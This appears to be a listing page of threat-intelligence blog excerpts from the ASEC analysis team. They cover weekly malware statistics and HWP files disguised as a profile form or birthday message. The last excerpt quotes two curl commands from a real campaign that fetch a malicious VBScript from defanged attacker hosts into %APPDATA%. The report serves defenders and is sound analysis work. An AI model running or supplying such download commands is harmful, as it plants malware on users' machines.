ASEC Weekly Malware Statistics (August 29th, 2022 – September 4th, 2022) Posted By jcleebobgatenet , September 14, 2022 The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 29th, 2022 (Monday) to September 4th, 2022 (Sunday). For the main category, info-stealer ranked top with 45.9%, followed by downloader with 28.1%, backdoor with 18.5%, ransomware with 6.2%, and CoinMiner and banking malware with 0.7% each. Top 1 – GuLoader GuLoader, which ranked first place with 22.6%, is a downloader malware that…
HWP File Disguised as Personal Profile Form (OLE Object) Posted By minakg1217 , September 5, 2022 The ASEC analysis team has recently identified a malicious HWP file that exploits OLE objects and flash vulnerabilities. The file uses a malicious URL identified in 2020. This URL contains a flash vulnerability (CVE-2018-15982) file, which requires users to take caution. The identified HWP file includes OLE objects, and the corresponding files are generated in the %TEMP% folder when the HWP file is opened. The created files are shown below. The HWP file does not directly use previously known files…
ASEC Weekly Malware Statistics (August 22nd, 2022 – August 28th, 2022) Posted By jcleebobgatenet , September 1, 2022 The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 22nd, 2022 (Monday) to August 28th, 2022 (Sunday). For the main category, info-stealer ranked top with 41.0%, followed by backdoor with 31.8%, downloader with 21.4%, and ransomware with 5.8%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 23.7%. It is an info-stealer that leaks user credentials…
ASEC Weekly Malware Statistics (August 15th, 2022 – August 21st, 2022) Posted By jcleebobgatenet , September 1, 2022 The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 15th, 2022 (Monday) to August 21st, 2022 (Sunday). For the main category, info-stealer ranked top with 57.8%, followed by backdoor with 24.2%, downloader with 13.7%, ransomware with 3.7%, and CoinMiner with 0.6%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 38.5%. It is an info-stealer that leaks…
Malicious HWP File Disguised as a Happy Birthday Message (OLE Object) Posted By jcleebobgatenet , September 1, 2022 The ASEC analysis team has recently discovered a VBScript that downloads a malicious HWP file. The distribution path of malware is yet to be determined, but the VBScript is downloaded through curl. The commands discovered so far are as follows: curl -H \”user-agent: chrome/103.0.5060.134 safari/537.32\” hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\\vbtemp cmd /c cd > %appdata%\\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\\vbtemp Both commands save scripts in the %APPDATA% folder as vbtemp. As shown below, hxxp://datkka.atwebpages[.]com/2vbs contains VBScript codes that perform features such as registering to task…
